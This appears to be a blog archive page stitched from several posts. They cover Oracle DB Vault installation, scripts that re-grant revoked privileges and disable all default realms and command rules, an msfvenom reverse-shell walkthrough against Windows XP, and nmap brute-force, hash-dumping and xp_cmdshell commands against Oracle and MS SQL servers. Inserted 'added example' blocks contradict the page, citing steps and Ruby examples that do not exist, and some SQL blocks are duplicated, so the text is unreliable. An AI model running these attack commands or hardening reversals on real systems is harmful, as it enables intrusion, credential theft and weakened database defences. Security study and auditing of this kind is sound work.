During the DB Vault installation Oracle revokes some system and object privileges from some roles and from PUBLIC. This can create problems in your application; therefore, if you want to re-grant all these privileges you can use the script below. Keep in mind that these revocations are part of DB Vault's hardening (EXECUTE on UTL_FILE for PUBLIC and BECOME USER for DBA, for example), so re-grant only what your application actually needs.

connect sys as sysdba

Grant EXECUTE on SYS.DBMS_FILE_TRANSFER to EXECUTE_CATALOG_ROLE ;
Grant EXECUTE on SYS.DBMS_LOGMNR to EXECUTE_CATALOG_ROLE ;
Grant EXECUTE on SYS.DBMS_LOGMNR_D to EXECUTE_CATALOG_ROLE ;
Grant EXECUTE on SYS.DBMS_LOGMNR_LOGREP_DICT to EXECUTE_CATALOG_ROLE ;
Grant EXECUTE on SYS.DBMS_LOGMNR_SESSION to EXECUTE_CATALOG_ROLE ;
Grant EXECUTE on SYS.UTL_FILE to PUBLIC ;
Grant BECOME USER to DBA ;
Grant CREATE ANY JOB to DBA ;
Grant CREATE EXTERNAL JOB to DBA ;
Grant DEQUEUE ANY QUEUE to DBA ;
Grant ENQUEUE ANY QUEUE to DBA ;
Grant EXECUTE ANY CLASS to DBA ;
Grant EXECUTE ANY PROGRAM to DBA ;
Grant MANAGE ANY QUEUE to DBA ;
Grant MANAGE SCHEDULER to DBA ;
Grant SELECT ANY TRANSACTION to DBA ;
Grant BECOME USER to IMP_FULL_DATABASE ;
Grant MANAGE ANY QUEUE to IMP_FULL_DATABASE ;
Grant CREATE ANY JOB to SCHEDULER_ADMIN ;
Grant CREATE EXTERNAL JOB to SCHEDULER_ADMIN ;
Grant EXECUTE ANY CLASS to SCHEDULER_ADMIN ;
Grant EXECUTE ANY PROGRAM to SCHEDULER_ADMIN ;
Grant MANAGE SCHEDULER to SCHEDULER_ADMIN ;
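Steps 1, 3 and 4 above, together with step 2 of the installation post, are one technique: snapshot a view before the installation, snapshot it again afterwards, and act on the difference. The following added example (not part of the original post; Ruby, to match the rest of this page's examples) performs that comparison over rows of the same shape as the a_*/b_* tables, checks both directions, and generates the re-grant statements from the actual difference instead of from a hand-typed list. The rows are constructed for illustration; in practice they would be read from the snapshot tables, for instance through ruby-oci8.

```ruby
# Added example, not from the original post. Rows are constructed to look like
# dba_sys_privs / dba_tab_privs and like the a_dba_objects / b_dba_objects
# tables; in real use they come from those tables.

BEFORE_PRIVS = [
  { grantee: 'DBA', privilege: 'BECOME USER', admin_option: 'NO' },
  { grantee: 'DBA', privilege: 'CREATE ANY JOB', admin_option: 'NO' },
  { grantee: 'DBA', privilege: 'CREATE SESSION', admin_option: 'YES' },
  { grantee: 'IMP_FULL_DATABASE', privilege: 'BECOME USER', admin_option: 'NO' },
  { grantee: 'PUBLIC', owner: 'SYS', table_name: 'UTL_FILE', privilege: 'EXECUTE' }
].freeze

AFTER_PRIVS = [
  { grantee: 'DBA', privilege: 'CREATE ANY JOB', admin_option: 'NO' },
  { grantee: 'DBA', privilege: 'CREATE SESSION', admin_option: 'YES' },
  { grantee: 'C##DVOWNER', privilege: 'SET CONTAINER', admin_option: 'NO' }  # new after install
].freeze

BEFORE_INVALID = [
  { owner: 'APP', object_name: 'PKG_LEGACY', object_type: 'PACKAGE BODY' }
].freeze

AFTER_INVALID = [
  { owner: 'APP', object_name: 'PKG_LEGACY', object_type: 'PACKAGE BODY' },
  { owner: 'APP', object_name: 'VW_FILE_EXPORT', object_type: 'VIEW' }        # newly invalid
].freeze

# Both directions of the MINUS query on the page:
#   :removed = before MINUS after (privileges revoked, objects fixed)
#   :added   = after MINUS before (privileges granted, objects newly invalid)
# Hash rows compare by content, so Array#- behaves like set difference.
def snapshot_diff(before, after)
  { removed: before - after, added: after - before }
end

# One GRANT per revoked row; object privileges carry an ON clause and
# system privileges that had ADMIN OPTION keep it.
def regrant_statement(row)
  on  = row[:table_name] ? " ON #{row[:owner]}.#{row[:table_name]}" : ''
  adm = row[:admin_option] == 'YES' ? ' WITH ADMIN OPTION' : ''
  "GRANT #{row[:privilege]}#{on} TO #{row[:grantee]}#{adm};"
end

# The re-grant script for exactly what the installation revoked; review each
# line before running it, since some revocations are intended hardening.
def regrant_script(before, after)
  snapshot_diff(before, after)[:removed].map { |r| regrant_statement(r) }
end

# Objects that went from valid to INVALID during the installation.
def newly_invalid(before, after)
  snapshot_diff(before, after)[:added]
end

if __FILE__ == $PROGRAM_NAME
  puts '-- revoked during installation:'
  puts regrant_script(BEFORE_PRIVS, AFTER_PRIVS)
  puts '-- newly invalid objects:'
  newly_invalid(BEFORE_INVALID, AFTER_INVALID).each { |o| puts "#{o[:owner]}.#{o[:object_name]} (#{o[:object_type]})" }
end
```

With the page's own snapshot tables the same logic is the pair of queries `a minus b` and `b minus a` on each view; the point of generating the GRANTs from the difference is that the list is then specific to this database rather than the generic one above, and a row such as `GRANT EXECUTE ON SYS.UTL_FILE TO PUBLIC;` is a conscious decision rather than a side effect of a copy-paste.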

5. Disable the default realms and command rules

After the DB Vault installation some pre-defined realms and command rules are created by Oracle. If this is your first installation you may want to disable some realms and command rules, because these pre-defined realms and command rules can cause problems in your application. This control point depends completely on your application, but I will give you the script below to disable all realms and command rules. Later you can enable these rules step by step while checking your application.

connect dvowner

select * from dvsys.DBA_DV_REALM ;

BEGIN
DVSYS.DBMS_MACADM.UPDATE_REALM(
realm_name => 'Oracle Database Vault',
description => 'Defines the realm for the Oracle Database Vault schemas - DVSYS, DVF and LBACSYS where Database Vault access control configuration and roles are contained.',
enabled => 'N',
audit_options => 1);
END;
/

BEGIN
DVSYS.DBMS_MACADM.UPDATE_REALM(
realm_name => 'Database Vault Account Management',
description => 'Defines the realm for administrators who create and manage database accounts and profiles.',
enabled => 'N',
audit_options => 1);
END;
/

BEGIN
DVSYS.DBMS_MACADM.UPDATE_REALM(
realm_name => 'Oracle Enterprise Manager',
description => 'Defines the Enterprise Manager monitoring and management realm.',
enabled => 'N',
audit_options => 1);
END;
/

BEGIN
DVSYS.DBMS_MACADM.UPDATE_REALM(
realm_name => 'Oracle Default Schema Protection Realm',
description => 'Defines the realm for the Oracle Default schemas.',
enabled => 'N',
audit_options => 1);
END;
/

BEGIN
DVSYS.DBMS_MACADM.UPDATE_REALM(
realm_name => 'Oracle System Privilege and Role Management Realm',
description => 'Defines the realm to control granting of system privileges and database administrator roles.',
enabled => 'N',
audit_options => 1);
END;
/

BEGIN
DVSYS.DBMS_MACADM.UPDATE_REALM(
realm_name => 'Oracle Default Component Protection Realm',
description => 'Defines the realm to protect default components of the Oracle database.',
enabled => 'N',
audit_options => 1);
END;
/

commit;

select * from dvsys.DBA_DV_COMMAND_RULE;

BEGIN
DVSYS.DBMS_MACADM.UPDATE_COMMAND_RULE(
command => 'ALTER PROFILE',
rule_set_name => 'Can Maintain Accounts/Profiles',
object_owner => '%',
object_name => '%',
enabled => 'N');
commit;
END;
/

BEGIN
DVSYS.DBMS_MACADM.UPDATE_COMMAND_RULE(
command => 'ALTER SYSTEM',
rule_set_name => 'Allow Fine Grained Control of System Parameters',
object_owner => '%',
object_name => '%',
enabled => 'N');
commit;
END;
/

BEGIN
DVSYS.DBMS_MACADM.UPDATE_COMMAND_RULE(
command => 'ALTER USER',
rule_set_name => 'Can Maintain Own Account',
object_owner => '%',
object_name => '%',
enabled => 'N');
commit;
END;
/

BEGIN
DVSYS.DBMS_MACADM.UPDATE_COMMAND_RULE(
command => 'CHANGE PASSWORD',
rule_set_name => 'Can Maintain Own Account',
object_owner => '%',
object_name => '%',
enabled => 'N');
commit;
END;
/

BEGIN
DVSYS.DBMS_MACADM.UPDATE_COMMAND_RULE(
command => 'CREATE PROFILE',
rule_set_name => 'Can Maintain Accounts/Profiles',
object_owner => '%',
object_name => '%',
enabled => 'N');
commit;
END;
/

BEGIN
DVSYS.DBMS_MACADM.UPDATE_COMMAND_RULE(
command => 'CREATE USER',
rule_set_name => 'Can Maintain Accounts/Profiles',
object_owner => '%',
object_name => '%',
enabled => 'N');
commit;
END;
/

BEGIN
DVSYS.DBMS_MACADM.UPDATE_COMMAND_RULE(
command => 'DROP PROFILE',
rule_set_name => 'Can Maintain Accounts/Profiles',
object_owner => '%',
object_name => '%',
enabled => 'N');
commit;
END;
/

BEGIN
DVSYS.DBMS_MACADM.UPDATE_COMMAND_RULE(
command => 'DROP USER',
rule_set_name => 'Can Maintain Accounts/Profiles',
object_owner => '%',
object_name => '%',
enabled => 'N');
commit;
END;
/

commit;

select * from dvsys.DBA_DV_REALM ;

BEGIN
DVSYS.DBMS_MACADM.UPDATE_REALM(
realm_name => ‘Oracle Database Vault’,
description => ‘Defines the realm for the Oracle Database Vault schemas – DVSYS, DVF and LBACSYS where Database Vault access control configuration and roles are contained.’,
enabled => ‘N’,
audit_options => 1);
END;
/

BEGIN
DVSYS.DBMS_MACADM.UPDATE_REALM(
realm_name => ‘Database Vault Account Management’,
description => ‘Defines the realm for administrators who create and manage database accounts and profiles.’,
enabled => ‘N’,
audit_options => 1);
END;
/
BEGIN
DVSYS.DBMS_MACADM.UPDATE_REALM(
realm_name => ‘Oracle Enterprise Manager’,
description => ‘Defines the Enterprise Manager monitoring and management realm.’,
enabled => ‘N’,
audit_options => 1);
END;
/

BEGIN
DVSYS.DBMS_MACADM.UPDATE_REALM(
realm_name => ‘Oracle Default Schema Protection Realm’,
description => ‘Defines the realm for the Oracle Default schemas.’,
enabled => ‘N’,
audit_options => 1);
END;
/

BEGIN
DVSYS.DBMS_MACADM.UPDATE_REALM(
realm_name => ‘Oracle System Privilege and Role Management Realm’,
description => ‘Defines the realm to control granting of system privileges and database administrator roles.’,
enabled => ‘N’,
audit_options => 1);
END;
/

BEGIN
DVSYS.DBMS_MACADM.UPDATE_REALM(
realm_name => ‘Oracle Default Component Protection Realm’,
description => ‘Defines the realm to protect default components of the Oracle database.’,
enabled => ‘N’,
audit_options => 1);
END;
/

BEGIN
DVSYS.DBMS_MACADM.UPDATE_REALM(
realm_name => ‘Oracle System Privilege and Role Management Realm’,
description => ‘Defines the realm to control granting of system privileges and database administrator roles.’,
enabled => ‘N’,
audit_options => 1);
END;
/

select * from dvsys.DBA_DV_COMMAND_RULE;

BEGIN
DVSYS.DBMS_MACADM.UPDATE_COMMAND_RULE(
command => 'ALTER PROFILE',
rule_set_name => 'Can Maintain Accounts/Profiles',
object_owner => '%',
object_name => '%',
enabled => 'N');
commit;
END;
/

BEGIN
DVSYS.DBMS_MACADM.UPDATE_COMMAND_RULE(
command => 'ALTER SYSTEM',
rule_set_name => 'Allow Fine Grained Control of System Parameters',
object_owner => '%',
object_name => '%',
enabled => 'N');
commit;
END;
/

BEGIN
DVSYS.DBMS_MACADM.UPDATE_COMMAND_RULE(
command => 'ALTER USER',
rule_set_name => 'Can Maintain Own Account',
object_owner => '%',
object_name => '%',
enabled => 'N');
commit;
END;
/

BEGIN
DVSYS.DBMS_MACADM.UPDATE_COMMAND_RULE(
command => 'CHANGE PASSWORD',
rule_set_name => 'Can Maintain Own Account',
object_owner => '%',
object_name => '%',
enabled => 'N');
commit;
END;
/

BEGIN
DVSYS.DBMS_MACADM.UPDATE_COMMAND_RULE(
command => 'CREATE PROFILE',
rule_set_name => 'Can Maintain Accounts/Profiles',
object_owner => '%',
object_name => '%',
enabled => 'N');
commit;
END;
/

BEGIN
DVSYS.DBMS_MACADM.UPDATE_COMMAND_RULE(
command => 'CREATE USER',
rule_set_name => 'Can Maintain Accounts/Profiles',
object_owner => '%',
object_name => '%',
enabled => 'N');
commit;
END;
/

BEGIN
DVSYS.DBMS_MACADM.UPDATE_COMMAND_RULE(
command => 'DROP PROFILE',
rule_set_name => 'Can Maintain Accounts/Profiles',
object_owner => '%',
object_name => '%',
enabled => 'N');
commit;
END;
/

BEGIN
DVSYS.DBMS_MACADM.UPDATE_COMMAND_RULE(
command => 'DROP USER',
rule_set_name => 'Can Maintain Accounts/Profiles',
object_owner => '%',
object_name => '%',
enabled => 'N');
commit;
END;
/

commit;


6. Turn the Recycle Bin On

After DB Vault installation Oracle turns the recycle bin off for security reasons. If you want it back, you can turn it on again with the script below. The script first disables the ALTER SYSTEM command rule, because the default "Allow Fine Grained Control of System Parameters" rule set restricts which parameters can be changed, and re-enables the rule afterwards.

Connect dvowner

BEGIN
DVSYS.DBMS_MACADM.UPDATE_COMMAND_RULE(
command => 'ALTER SYSTEM',
rule_set_name => 'Allow Fine Grained Control of System Parameters',
object_owner => '%',
object_name => '%',
enabled => 'N');
commit;
END;
/

Connect sys as sysdba

alter system set recyclebin=on scope=spfile;

startup force;

Then enable the ALTER SYSTEM command rule again:

Connect dvowner

BEGIN
DVSYS.DBMS_MACADM.UPDATE_COMMAND_RULE(
command => 'ALTER SYSTEM',
rule_set_name => 'Allow Fine Grained Control of System Parameters',
object_owner => '%',
object_name => '%',
enabled => 'Y');
commit;
END;
/

Installing DB Vault to an Oracle 12c non-Container Database


In this note I will show how to install DB Vault on an Oracle 12c non-container database. Oracle 12c container databases will be covered in another post.

First, the environment:

Host: Oracle Linux 7 virtual machine on Oracle VM VirtualBox

DB: Oracle 12c 12.1.0.2.0 non-container database.

In Oracle 12c the Oracle Label Security and DB Vault options are already linked into the Oracle binary, but DBAs sometimes do not install these options during database creation. In that case you have to install the options first, and only then can you register DB Vault.

0. Check whether Oracle Label Security and DB Vault are installed

To check Oracle Label Security and DB Vault, use the SQL below:

SQL> select comp_id,status from dba_registry where comp_id in ('OLS','DV');

no rows selected

If the SQL returns "no rows selected", you have to install Oracle Label Security and Oracle DB Vault.

If Oracle Label Security and DB Vault are not installed, follow the note below first, then come back here to complete the DB Vault installation:

https://yusufanilakduygu.wordpress.com/2016/08/21/adding-oracle-label-security-and-db-vault-options-to-oracle-12c-database/

Otherwise, just register Oracle DB Vault: follow this note to the end to finish the installation.

1. Check whether DB Vault is already registered

SQL> column parameter format a25
SQL> column value format a10
SQL> SELECT parameter,value FROM gv$OPTION WHERE PARAMETER in
( 'Oracle Database Vault','Oracle Label Security');

PARAMETER                 VALUE
------------------------- ----------
Oracle Label Security     FALSE
Oracle Database Vault     FALSE

SQL>

As you can see, DB Vault has not been registered yet. After registration the VALUE column will show TRUE.

2. Take a backup of some tables and views

DB Vault registration revokes some privileges from the DBA, IMP_FULL_DATABASE and SCHEDULER_ADMIN roles, and some other critical privileges as well. Therefore we should keep a copy of the privilege-related dictionary views before registration; I advise backing them up with CREATE TABLE ... AS SELECT, as below.

I took the copies as the SYSTEM user.

SQL> connect system
Enter password:
Connected.
SQL> create table a_dba_network_acls as select * FROM cdb_network_acls;

Table created.

SQL> create table a_dba_network_acl_privileges as select * from cdb_network_acl_privileges;

Table created.

SQL> create table a_gv$parameter as select * from gv$parameter ;

Table created.

SQL> create table a_dba_tab_privs as Select * from dba_tab_privs;

Table created.

SQL> create table a_dba_sys_privs as Select * from dba_sys_privs;

Table created.

SQL> create table a_dba_role_privs as Select * from dba_role_privs;

Table created.

SQL> create table a_dba_objects as select owner,object_name,object_type from dba_objects where status='INVALID' and object_type <> 'SYNONYM' ;

Table created.

SQL> create table a_dba_registry as select * from dba_registry;

Table created.

SQL>

3. Create the DB Vault owner and user administrator users

During DB Vault registration you must create one user to administer DB Vault and one user to manage database accounts. These two users are required for separation of duties.

SQL> connect sys as sysdba
Enter password:
Connected.
SQL> CREATE USER dvowner IDENTIFIED BY oracle
2 DEFAULT TABLESPACE USERS
3 QUOTA UNLIMITED ON USERS;

User created.

SQL> GRANT CREATE SESSION TO dvowner;

Grant succeeded.

SQL> CREATE USER dvacctmngr IDENTIFIED BY oracle
2 DEFAULT TABLESPACE USERS
3 QUOTA UNLIMITED ON USERS;

User created.

SQL> GRANT CREATE SESSION TO dvacctmngr;

Grant succeeded.

SQL>

4. Configure DB Vault

Now we can register DB Vault by configuring it. Afterwards we recompile all invalid objects in the database.

SQL> connect sys as sysdba
Enter password:
Connected.

SQL> BEGIN
2 DVSYS.CONFIGURE_DV (
3 dvowner_uname => 'dvowner',
4 dvacctmgr_uname => 'dvacctmngr');
5 END;
6 /

PL/SQL procedure successfully completed.

SQL> @?/rdbms/admin/utlrp.sql

.

.

...Database user "SYS", database schema "APEX_040200", user# "98" 21:39:56
…Compiled 0 out of 3014 objects considered, 0 failed compilation 21:39:56
…271 packages
…263 package bodies
…452 tables
…11 functions
…16 procedures
…3 sequences
…457 triggers
…1320 indexes
…211 views
…0 libraries
…6 types
…0 type bodies
…0 operators
…0 index types
…Begin key object existence check 21:39:56
…Completed key object existence check 21:39:57
…Setting DBMS Registry 21:39:57
…Setting DBMS Registry Complete 21:39:57
…Exiting validate 21:39:57

PL/SQL procedure successfully completed.

5. Enable DB Vault

SQL> CONNECT dvowner
Enter password:
Connected.
SQL> EXEC DBMS_MACADM.ENABLE_DV;

PL/SQL procedure successfully completed.

SQL> commit;

Commit complete.

6. Restart the database and the installation is finished

SQL> connect sys as sysdba
Enter password:
Connected.
SQL> startup force
ORACLE instance started.

Total System Global Area 977272832 bytes
Fixed Size 2931520 bytes
Variable Size 666895552 bytes
Database Buffers 301989888 bytes
Redo Buffers 5455872 bytes
Database mounted.
Database opened.

SQL> column parameter format a25
SQL> column value format a10
SQL> SELECT parameter,value FROM gv$OPTION WHERE PARAMETER in
2 ( 'Oracle Database Vault','Oracle Label Security');

PARAMETER                 VALUE
------------------------- ----------
Oracle Label Security     TRUE
Oracle Database Vault     TRUE

As you can see, DB Vault is ready for use. In the next note I will show what you can do after installing DB Vault.
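The backup tables from step 2 are only useful if they are compared with the live data dictionary once registration is done. The script below is an added example and not part of the original note; it assumes the a_* tables created in step 2 exist in the SYSTEM schema and that it is run as SYSTEM (or another user with SELECT on those tables and on the DBA views). It shows which privileges and roles DB Vault revoked, which objects became invalid, and which parameters changed.

```sql
-- Added post-registration verification script (not from the original note).
-- Assumes the a_* backup tables from step 2 exist in the current (SYSTEM) schema.

-- 1. Confirm that DV and OLS are registered and the components are VALID
SELECT comp_id, status, version
FROM   dba_registry
WHERE  comp_id IN ('OLS', 'DV');

SELECT parameter, value
FROM   v$option
WHERE  parameter IN ('Oracle Database Vault', 'Oracle Label Security');

-- 2. System privileges that existed before registration but are gone now
SELECT grantee, privilege, admin_option
FROM   a_dba_sys_privs
MINUS
SELECT grantee, privilege, admin_option
FROM   dba_sys_privs
ORDER BY 1, 2;

-- 3. Role grants that were revoked (expect entries for DBA,
--    IMP_FULL_DATABASE and SCHEDULER_ADMIN, as the note says)
SELECT grantee, granted_role, admin_option
FROM   a_dba_role_privs
MINUS
SELECT grantee, granted_role, admin_option
FROM   dba_role_privs
ORDER BY 1, 2;

-- 4. Object privileges that were revoked
SELECT grantee, owner, table_name, privilege
FROM   a_dba_tab_privs
MINUS
SELECT grantee, owner, table_name, privilege
FROM   dba_tab_privs
ORDER BY 1, 2, 3;

-- 5. Objects that are INVALID now but were not before registration
--    (a_dba_objects only holds the objects that were invalid at backup time)
SELECT owner, object_name, object_type
FROM   dba_objects
WHERE  status = 'INVALID'
AND    object_type <> 'SYNONYM'
MINUS
SELECT owner, object_name, object_type
FROM   a_dba_objects
ORDER BY 1, 2;

-- 6. Parameters whose value changed (DB Vault turns the recycle bin off,
--    so RECYCLEBIN is expected to appear here)
SELECT b.name, b.value AS before_value, p.value AS after_value
FROM   a_gv$parameter b
JOIN   gv$parameter p ON p.inst_id = b.inst_id AND p.name = b.name
WHERE  NVL(b.value, '#') <> NVL(p.value, '#')
ORDER BY b.name;
```

Anything listed by queries 2 to 4 is a privilege that application or maintenance accounts relied on before DB Vault; decide per row whether to re-grant it through the DB Vault account manager or accept the revocation, rather than granting everything back wholesale.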


Hacking Windows XP with msfvenom

msfvenom is a program that generates shellcode for penetrating machines. In this note I will show how to penetrate a Windows XP machine with shellcode produced by msfvenom.

Before msfvenom, the msfpayload and msfencode programs were used. They are now obsolete and no longer supported, so we should use msfvenom.

In the examples I will use two machines: one is Kali and the other is Windows XP. I will produce the shellcode on the Kali machine and send it to the Windows XP machine (any social engineering method could be used, but to keep the example simple I will move it with FTP or any other means, because the aim of this note is to show the whole penetration process). An important note: during the penetration the client-side antivirus program has to be disabled. There are many ways to bypass antivirus programs, but that is outside the scope of this note.

First, look at the options of the msfvenom program.

As you can see, msfvenom has many options.

Now create shellcode with the simplest method.

If you look at the command line you will see some parameters. The most important one is LHOST, the IP address of the Kali machine. When someone starts this program on the Windows XP machine, the shellcode will try to connect back to the Kali machine (192.200.11.5). Before the shellcode connects, we have to start a listener that waits for connections from it; we will start the listener with the Metasploit Framework (msfconsole).

Now our shellcode is ready and you could deliver it to any computer with social engineering. Imagine that we send it by e-mail and the recipient runs it by some means.

Now we will start a listener in msfconsole to receive the connection from the Windows XP machine. First start msfconsole.

msfconsole is the central console of the Metasploit Framework.

Set up the listener in msfconsole with the reverse_tcp payload and wait for the back-connection.

Now the listener is waiting for the shellcode (which sits on the Windows XP machine) to connect.

Now start x.exe on Windows XP by double-clicking it.

Go back to Kali and you will see that the back-connection is established and Meterpreter has started. We are now connected to the Windows XP machine.

From here on we are inside the Windows XP machine and can control the penetrated machine.

After penetration you are in the post-exploitation phase, which I will cover in depth in a different note.

Anıl Akduygu

Oracle Security checks with nmap

Introduction

Nmap is an open-source utility for network discovery and security auditing. It was originally developed for network security, and many external scripts have since been added to check databases, web servers and other systems in the IT infrastructure.

In this note I will present the nmap scripts developed to check Oracle databases and explain the details with samples. For this note I used two virtual machines: one, as you would expect, is Kali; the other is Oracle Linux running an Oracle 11g database.

Start with guessing the Oracle SID

Guess Oracle SID

The oracle-sid-brute script guesses Oracle instance/SID names.

The file /usr/share/nmap/nselib/data/oracle-sids contains a list of common Oracle SIDs; nmap tries each entry against the listener to find the SIDs that exist.

Now try to find the Oracle SID of localhost7 with the oracle-sid-brute script.

———————————————————–

nmap --script=oracle-sid-brute -p 1521-1900 localhost7

Not shown: 359 filtered ports
PORT STATE SERVICE
1521/tcp open oracle
| oracle-sid-brute:
|_ DB2TEST
1522/tcp open rna-lm
1523/tcp open cichild-lm
1530/tcp open unknown
1545/tcp open vistium-share
1555/tcp open unknown
1556/tcp open veritas_pbx
1557/tcp open unknown
1560/tcp open asci-val
1563/tcp open unknown
1575/tcp open unknown
1585/tcp open unknown
1591/tcp open unknown
1621/tcp open unknown
1681/tcp open unknown
1731/tcp open unknown
1733/tcp open unknown
1831/tcp open unknown
1890/tcp open unknown
1898/tcp open unknown
1899/tcp open unknown

——————————————————————-

Gotcha, we found it: DB2TEST. If you have your own Oracle SID list at /path/sidfile you can use it like this:

nmap --script=oracle-sid-brute --script-args=oraclesids=/path/sidfile -p 1521-1800 <hostname>

Now we will try to guess Oracle usernames and passwords.

Password guessing (brute force)

The oracle-brute script checks common Oracle usernames and passwords. The list of common Oracle usernames and passwords can be found in the file /usr/share/nmap/nselib/data/oracle-default-accounts.lst.

———————————————————–

nmap -p1521 --script oracle-brute --script-args oracle-brute.sid=DB11G 192.200.11.9

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-07-02 10:19 EDT
Nmap scan report for 192.200.11.9
Host is up (0.0010s latency).
PORT STATE SERVICE
1521/tcp open oracle
| oracle-brute:
| Accounts:
| DIP:DIP – Account is locked
| XDB:CHANGE_ON_INSTALL – Account is locked
|_ Statistics: Performed 695 guesses in 13 seconds, average tps: 53

Nmap done: 1 IP address (1 host up) scanned in 30.89 second

————————————————————–

As you can see, two accounts were found, but they are locked, so our database passed this test. Had the administrators forgotten about these default accounts and left them open, this script would have found working credentials.

If you have your own username and password lists, you can use the command below:

nmap -sV --script oracle-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt <target>

To quit after finding one valid account, use the argument brute.firstOnly:

nmap -sV --script oracle-brute --script-args brute.firstOnly <target>

To set a different time limit, use the argument unpwdb.timelimit. To run indefinitely, set it to 0:

nmap -sV --script oracle-brute --script-args unpwdb.timelimit=0 <target>
nmap -sV --script oracle-brute --script-args unpwdb.timelimit=60m <target>

Brute modes

user: for each user listed in userdb, every password in passdb will be tried
nmap --script oracle-brute --script-args brute.mode=user <target>

pass: for each password listed in passdb, every user in userdb will be tried
nmap --script oracle-brute --script-args brute.mode=pass <target>
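From the DBA side, the counterpart of oracle-brute is checking whether any account still carries a well-known default password and whether the audit trail shows a password-guessing burst. The queries below are an added example, not from the original note; they assume a DBA connection to an 11g or later database and that audit_trail is set to DB (DBA_USERS_WITH_DEFPWD exists from 11g; on 12c with unified auditing query UNIFIED_AUDIT_TRAIL and its RETURN_CODE column instead of DBA_AUDIT_SESSION). The threshold of 20 failed logons is a constructed value to tune per environment.

```sql
-- Added defender-side check (not from the original note). Run as a DBA.

-- 1. Accounts whose password is still a known default: this is exactly what
--    oracle-brute tries. An OPEN account here is a finding; LOCKED ones are
--    what the scan above reported for DIP and XDB.
SELECT d.username,
       u.account_status,
       u.profile,
       u.expiry_date
FROM   dba_users_with_defpwd d
JOIN   dba_users u ON u.username = d.username
ORDER BY CASE WHEN u.account_status = 'OPEN' THEN 0 ELSE 1 END, d.username;

-- Remediation for any account reported OPEN above (run per account after review):
-- ALTER USER xdb ACCOUNT LOCK PASSWORD EXPIRE;

-- 2. Failed logons per source host in the last day. A brute-force script
--    produces many ORA-01017 (returncode 1017) failures from one host against
--    many distinct usernames in a short window; a single user mistyping a
--    password does not. Requires audit_trail=DB and AUDIT SESSION.
SELECT userhost,
       COUNT(*)                 AS failed_logons,
       COUNT(DISTINCT username) AS distinct_users,
       MIN(timestamp)           AS first_seen,
       MAX(timestamp)           AS last_seen
FROM   dba_audit_session
WHERE  returncode = 1017
AND    timestamp > SYSDATE - 1
GROUP BY userhost
HAVING COUNT(*) >= 20          -- constructed threshold; tune for your site
ORDER BY failed_logons DESC;
```

The first query is the one to run before any scan: it answers the question the scan asks without sending a single guess to the listener. The second is what turns the scan from the note into an alert on the database side; a row with a high distinct_users count over a few seconds is the signature of the 695-guesses-in-13-seconds run shown above.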

For the Oracle TNS poison attack you can read my other article:

https://yusufanilakduygu.wordpress.com/2016/06/12/oracle-tns-poison-attack/

This is the end of this note.

I hope it gives you a new perspective on Oracle Database security.

Anıl Akduygu

Control MS SQL Server security with nmap


nmap has many valuable scripts to check the security of an MS SQL Server database. In this note I will show how you can audit your SQL Server with nmap.

Check the sa account for a null password

ms-sql-empty-password

Attempts to authenticate to Microsoft SQL Servers using an empty password for the sysadmin (sa) account.

One example:

nmap -p 1433 --script ms-sql-empty-password 192.200.11.11

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-12 12:41 EDT
Nmap scan report for 192.200.11.11
Host is up (0.00064s latency).
PORT     STATE SERVICE
1433/tcp open  ms-sql-s
| ms-sql-empty-password:
|   [192.200.11.11:1433]
|_    sa:<empty> => Login Success
MAC Address: 08:00:27:37:86:AC (Cadmus Computer Systems)
Nmap done: 1 IP address (1 host up) scanned in 17.5

If port 445 (the microsoft-ds service) is open, you can also run it this way:

nmap -p 445 --script ms-sql-empty-password --script-args mssql.instance-all 192.200.11.11

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-12 12:44 EDT
Nmap scan report for 192.200.11.11
Host is up (0.00059s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 08:00:27:37:86:AC (Cadmus Computer Systems)

Host script results:
| ms-sql-empty-password:
|   [192.200.11.11:1433]

Brute-force attacks

nmap -p1433 --script ms-sql-brute 192.200.11.11

Host is up, received arp-response (0.00064s latency).
Scanned at 2016-06-12 12:20:41 EDT for 157s
PORT     STATE SERVICE  REASON
1433/tcp open  ms-sql-s syn-ack ttl 128
| ms-sql-brute:
|   [192.200.11.11:1433]
|_    No credentials found
MAC Address: 08:00:27:37:86:AC (Cadmus Computer Systems)
Final times for host: srtt: 636 rttvar: 3138  to: 100000

Dumping the password hashes of an MS SQL server

If the sa password is null:

nmap -p1433 --script ms-sql-empty-password,ms-sql-dump-hashes 192.200.11.11

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-19 05:03 EDT
Nmap scan report for 192.200.11.11
Host is up (0.016s latency).
PORT     STATE SERVICE
1433/tcp open  ms-sql-s
| ms-sql-dump-hashes:
| [192.200.11.11:1433]
|     sa:0x0200EC357FC5FA85256C4BC37667845B81E84C0F3CA9E7AD2BC7FB94FB698E5243FC5112C2B240884C44E71FD45195BB60B4AAF63D24B909C5945285793D0605E4D09E886849
|     ##MS_PolicyTsqlExecutionLogin##:0x0200251457811E7CB37A8C9746EC742325673A60D16B98DF182FCF7E4410A2FB1B03C36B2E60A68BB269C7D47B3C43F6CB485365CF5D171A48171B6DA6DB74CDEA40759E9DFC
|     ##MS_PolicyEventProcessingLogin##:0x0200F8A9BBBADB33E242C190EE82D15BB47564F46C5BF7B29B0124F32DCFF96837F9F243BD054F0A0D2B8D5C4D95F885B30EAA47F94F7FBBD3EA613DF64F05E14659742EB868

Getting information

Attempts to determine configuration and version information for Microsoft SQL Server instances. No credentials are required.

nmap -p1433-1900 --script ms-sql-info 192.200.11.11

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-12 11:55 EDT
Nmap scan report for 192.200.11.11
Host is up (0.00096s latency).
Not shown: 467 closed ports
PORT STATE SERVICE
1433/tcp open ms-sql-s
MAC Address: 08:00:27:37:86:AC (Cadmus Computer Systems)

Host script results:
| ms-sql-info:
| 192.200.11.11:1433:
| Version:
| number: 11.00.3128.00
| Post-SP patches applied: true
| Service pack level: SP1
| Product: Microsoft SQL Server 2012
| name: Microsoft SQL Server 2012 SP1+
|_ TCP port: 1433

Running a command shell on MS SQL servers

To run the dir command on the Windows server when the sa password is null:

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password='',ms-sql-xp-cmdshell.cmd="dir" 192.200.11.11

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-19 05:38 EDT
Nmap scan report for 192.200.11.11
